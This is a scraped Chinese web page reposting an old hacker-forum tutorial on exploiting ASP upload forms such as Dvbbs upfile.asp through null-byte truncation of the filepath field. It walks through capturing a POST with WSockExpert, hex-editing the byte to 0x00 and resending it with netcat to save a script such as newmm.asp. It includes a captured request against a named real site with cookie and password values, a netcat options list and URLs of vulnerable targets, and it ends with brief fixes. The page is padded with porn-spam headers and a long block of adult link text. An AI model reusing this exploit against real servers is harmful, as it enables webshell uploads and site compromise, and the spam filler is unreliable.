婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > asp 之上傳漏洞終結篇

asp 之上傳漏洞終結篇

熱門標簽:離線電子地圖標注軟件注冊 企數外呼系統能用多久 外呼回撥系統圖片 常用地圖標注范圍點 為什么外呼系統需要預存話費呢 寧夏怎么申請400電話 辦理400電話一年多少錢 蘭州智能語音電銷機器人功能 咸陽銷售外呼系統
收藏關于上傳漏洞的文章,最近一直遇到這個麻煩,
作者:szjwwwww     
出自:黑鷹基地論壇
http://www.3800cc.com
一、寫在前面
***這個上傳漏洞利用的原理只是針對form格式上傳的asp和php腳本***
NC(Netcat)
用于提交 數據包
DOS界面下運行:
   NC -vv www.***.com 801.txt
   -vv: 回顯
   80:  www端口
   1.txt: 就是你要發送的數據包
  (更多使用方法請查看本區的帖子) 
WSE(WSockExpert)
   對本機端口的監視,抓取IE提交的數據包
  (不會用的就自己到網上搜資料N多)
二、漏洞原理
下面例子假設的前提
www主機:  www.***.com;
bbs路徑 :  /bbs/
漏洞源于對動網上傳文件的研究,建議有一定編程經驗的
看看Dvbbs的upfile.asp文件,沒有必要全部看懂
upfile是通過生成一個form表上傳,
用到的變量:
filepath 默認值uploadface 屬性hiden
act      默認值upload     屬性hiden
file1    就是你要傳的那個文件
關鍵是 filepath 這個變量!
默認情況下我們的文件上傳到www.***.com/bbs/uploadface/
文件是用你的上傳時間命名的,就是upfile里的這一句
FileName=FormPathyear(now)month(now)day(now)hour(now)minute(now)second(now)ranNum"."FileExt
-------------------------------------------------------------------------
我們知道計算機里面的數據是一"\0"為標致的用過C語言的都知道
char data[]="bbs"
這個data數組長度是4: b b s \0
如果我們構造filepath如下,會怎么樣呢?
filepath="/newmm.asp\0"
我們在2004.09.24.08.24傳的文件就會發生變化
沒有改時:
http://www.***.com/bbs/uploadface/200409240824.jpg
用我們構造的filepath時:
http://www.***.com/newmm.asp\0/200409240824.jpg
這樣當服務器接收filepath數據時,檢測到newmm.asp后面的\0
就理解為filepath的數據就結束了
這樣我們上傳的文件,比如c:\1.asp
就保存成: http://www.***.com/newmm.asp
三、后期補充
漏洞公布以后很多網站做了相應的處理,但是對于filepath的過濾和處理都不行
有很多網站只是加了N個hiden屬性的變量對付網上公布的upfile.exe就是那個
上傳漏洞利用工具或者filepath變量利用工具(老兵的)...但是最基本的沒改啊。。
而且很對網站的插件里有類似的漏洞,我要說的不要依賴哪些專門的工具 
自己改WSE抓到的包里的filepath變量,然后在用NC提交。。。
就算他加N個hiden變量也于事無補。
當然,如果對filepath做了很嚴格的過濾的話我們的這些理論就將宣告終結
就是我們的新理論誕生的時候!
四、漏洞列表
http://dvd.3800cc.com/dispbbs.asp?BoardID=20ID=5369
http://dvd.3800cc.com/dispbbs.asp?BoardID=20ID=5530
http://dvd.3800cc.com/dispbbs.asp?BoardID=20ID=5531
http://dvd.3800cc.com/dispbbs.asp?BoardID=20ID=5693
http://dvd.3800cc.com/dispbbs.asp?BoardID=20ID=5731
http://dvd.3800cc.com/dispbbs.asp?BoardID=20ID=5746
監聽外部主機
        NC [-options] hostname port[s] [ports] ...
監聽本地主機
        NC -l -p port [options] [hostname] [port]
options:
        -d              detach from console, stealth mode
        -e prog         inbound program to exec [dangerous!!]
        -g gateway      source-routing hop point[s], up to 8
        -G num          source-routing pointer: 4, 8, 12, ...
        -h              this cruft
        -i secs         delay interval for lines sent, ports scanned
        -l              listen mode, for inbound connects
        -L              listen harder, re-listen on socket close
        -n              numeric-only IP addresses, no DNS
        -o file         hex dump of traffic
        -p port         local port number
        -r              randomize local and remote ports
        -s addr         local source address
        -t              answer TELNET negotiation
        -u              UDP mode
        -v              verbose [use twice to be more verbose]
        -w secs         timeout for connects and final net reads
        -z              zero-I/O mode [used for scanning]
port numbers can be individual  or ranges: m-n [inclusive]
詳細實例:
---------------------------------------------------------------------------------
一、WSE抓包結果(存到1.txt里):
POST /bbs/upPhoto/upfile.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.xin126.com/bbs/upPhoto/upload.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d423a138d0278
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: www.xin126.com
Content-Length: 1969
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDACCCCDCS=NJHCPHPALBCANKOBECHKJANF; isCome=1; GAMVANCOOKIES=1; regTime=2004%2D9%2D24+3%3A39%3A37; username=szjwwwww; pass=5211314; dl=0; userID=62; ltStyle=0; loginTry=1; userPass=eb03f6c72908fd84
-----------------------------7d423a138d0278
Content-Disposition: form-data; name="filepath"
../medias/myPhoto/
-----------------------------7d423a138d0278
... ...
上傳
-----------------------------7d423a138d0278--
---------------------------------------------------------------------------------
二、UltraEdit打開1.txt改數據:
......
-----------------------------7d423a138d0278
Content-Disposition: form-data; name="filepath"
/newmm.asp█                 ===這個黑色代表一個空格是 0x20,改成0x00就可以了
......
三、重新計算cookies長度,然后nc提交
Nc -vv www.xin126.com 80 1.txt
UltraEdit是一個16位編輯器網上可以下載得到
我們主要用來寫那個結束標致: \0 ====>16位表示:0x00或者00H
其實你改的時候就直接再filepath的結尾 
處加個00就OK了
計算cookies長度===>你把fillepath改了之后、肯定是或+或—cookies的長度變了
......
Host: www.xin126.com
Content-Length: 1969  ======就是這個
Connection: Keep-Alive
Cache-Control: no-cache
......
計算會吧?一個字母、數字就是1
對于上傳漏洞提出的解決思路:(僅供參考)
1、一般的上傳是把上傳路徑作為一個變量來處理
===>我們的對策就是把filepath變成常量。。。
這個方法是目前最有效的(我認為的) 
2、加強對于\0的處理,原來我們是讀到這里就結束
我們繼續讀直道下一個變量開始的地方,處理就OK了

標簽:鐵嶺 家電維修 昌都 溫州 泰州 昆明 麗江 咸陽

巨人網絡通訊聲明:本文標題《asp 之上傳漏洞終結篇》,本文關鍵詞  asp,之,上傳,漏洞,終結,篇,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《asp 之上傳漏洞終結篇》相關的同類信息!
  • 本頁收集關于asp 之上傳漏洞終結篇的相關信息資訊供網民參考!
  • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    欧美精品日日鲁夜夜添| 欧美性受xxxx| 欧美日韩aaaaa| 亚洲欧洲成人自拍| av高清久久久| 中文幕一区二区三区久久蜜桃| 韩国三级电影一区二区| 久久久久久久久久久久久夜| 高清shemale亚洲人妖| 欧美激情资源网| 91美女片黄在线| 三级在线观看一区二区| 精品女同一区二区| 成人教育av在线| 亚洲嫩草精品久久| 欧美日韩成人综合天天影院 | 麻豆国产精品视频| 久久久www成人免费毛片麻豆| 国产美女精品人人做人人爽| 国产精品每日更新| 色综合久久中文字幕| 日日骚欧美日韩| 日本一区二区视频在线观看| 色狠狠av一区二区三区| 亚洲国产精品一区二区www| 日韩一区二区三区av| 成人精品一区二区三区四区| 亚洲精品国产品国语在线app| 欧美猛男男办公室激情| 高清不卡在线观看av| 日韩主播视频在线| 国产精品卡一卡二| 欧美丰满少妇xxxxx高潮对白| 国产一区福利在线| 日日欢夜夜爽一区| 中文字幕在线播放不卡一区| 欧美一区二区精品| 91蜜桃网址入口| 国产精品综合一区二区三区| 一区二区成人在线视频| 久久久精品2019中文字幕之3| 欧美午夜影院一区| 成人在线综合网| 精品一区二区综合| 五月婷婷色综合| 中文字幕日韩一区二区| 久久精品一区蜜桃臀影院| 宅男在线国产精品| 色婷婷av一区二区三区之一色屋| 精品一区二区成人精品| 亚洲成在线观看| 亚洲日本韩国一区| 日本一二三四高清不卡| 精品国产乱码久久| 久久综合九色综合欧美就去吻| 在线播放91灌醉迷j高跟美女| 日本乱人伦一区| av在线不卡免费看| 丁香桃色午夜亚洲一区二区三区| 另类小说图片综合网| 麻豆一区二区三| 日日夜夜精品免费视频| 亚洲成人自拍一区| 亚洲精品国产高清久久伦理二区| 亚洲国产精品成人综合| 欧美一区在线视频| 色综合久久久网| 色狠狠一区二区三区香蕉| 北条麻妃国产九九精品视频| 粉嫩嫩av羞羞动漫久久久| 国产91在线观看| 国产不卡高清在线观看视频| 国产成人av一区二区| a4yy欧美一区二区三区| 一本高清dvd不卡在线观看| www.成人网.com| 欧美在线高清视频| 91麻豆精品国产自产在线| 欧美一区二区三区日韩视频| 欧美一区欧美二区| 26uuu国产一区二区三区| 久久久99久久精品欧美| 欧美国产精品v| 亚洲乱码中文字幕| 一级特黄大欧美久久久| 午夜精品久久久久| 麻豆精品一区二区综合av| 国产在线不卡一区| 成人美女视频在线看| 色一情一伦一子一伦一区| 成人黄色在线看| 成人aa视频在线观看| 欧美一级爆毛片| 丁香另类激情小说| 天天色天天操综合| 精品国产百合女同互慰| 欧美日韩亚洲综合在线| 精品毛片乱码1区2区3区| 激情亚洲综合在线| 国产91对白在线观看九色| 激情六月婷婷久久| av电影在线不卡| ...中文天堂在线一区| 亚洲影视在线播放| 日韩女同互慰一区二区| 欧美一区二区视频在线观看2020| 亚洲国产精品久久艾草纯爱| 欧美午夜不卡在线观看免费| av色综合久久天堂av综合| 久久夜色精品国产欧美乱极品| 亚洲电影视频在线| 国产精品欧美久久久久一区二区| 亚洲精品伦理在线| 97久久超碰国产精品| 欧美一级片免费看| 九九热在线视频观看这里只有精品| 麻豆91在线播放免费| 久久亚洲精华国产精华液| 麻豆免费看一区二区三区| 欧美人狂配大交3d怪物一区| 99久久综合99久久综合网站| 国产一区二区三区在线看麻豆| 日韩亚洲欧美在线| 激情文学综合网| 午夜电影久久久| 久久影音资源网| 国产精品嫩草影院com| 国产精品性做久久久久久| 亚洲精品视频一区二区| 欧美少妇xxx| 日本韩国视频一区二区| 91黄色免费看| 欧美午夜精品久久久久久超碰| 成人免费电影视频| 91亚洲男人天堂| 91麻豆国产福利精品| 激情久久久久久久久久久久久久久久| 国产精品第四页| 91麻豆精品国产91久久久更新时间| 欧美成人性福生活免费看| 日韩色视频在线观看| 综合色中文字幕| 亚洲欧美日韩电影| av在线不卡观看免费观看| 国产一区二区日韩精品| gogo大胆日本视频一区| 欧美日韩国产一级片| 日韩一级二级三级精品视频| 中文字幕久久午夜不卡| 色婷婷综合久久久中文一区二区| 久久精品国产网站| 激情五月播播久久久精品| 免费av成人在线| 国产91在线看| 亚洲图片有声小说| 亚洲女同ⅹxx女同tv| 国产精品理论在线观看| 中文字幕制服丝袜成人av| 亚洲成人动漫在线免费观看| 国产成人亚洲精品青草天美| 亚洲激情成人在线| 日韩精品一二区| 成人黄色国产精品网站大全在线免费观看 | 一本到一区二区三区| av一二三不卡影片| 4438x成人网最大色成网站| 中文字幕视频一区| 成人免费观看男女羞羞视频| 2020国产精品| 色综合久久久久综合体| 久久精品夜色噜噜亚洲aⅴ| 日本va欧美va瓶| 欧美精选一区二区| 亚洲影院理伦片| av日韩在线网站| 久久久91精品国产一区二区精品 | 亚洲国产精品传媒在线观看| 精品国产成人系列| 日韩成人一级大片| 在线观看网站黄不卡| 久久丝袜美腿综合| 99久久久久久| 久久av资源网| 欧美日韩精品系列| 欧美激情在线一区二区| 韩国女主播一区二区三区| 欧美体内she精高潮| 亚洲欧美日韩国产成人精品影院 | 日韩激情av在线| 91福利资源站| 亚洲高清三级视频| 色婷婷久久久综合中文字幕| 日韩毛片高清在线播放| 欧美日韩在线三区| 99久久综合国产精品| 91视频国产资源| 麻豆精品一区二区三区| 亚洲猫色日本管| 久久精品视频免费| 日韩精品一区二区三区swag |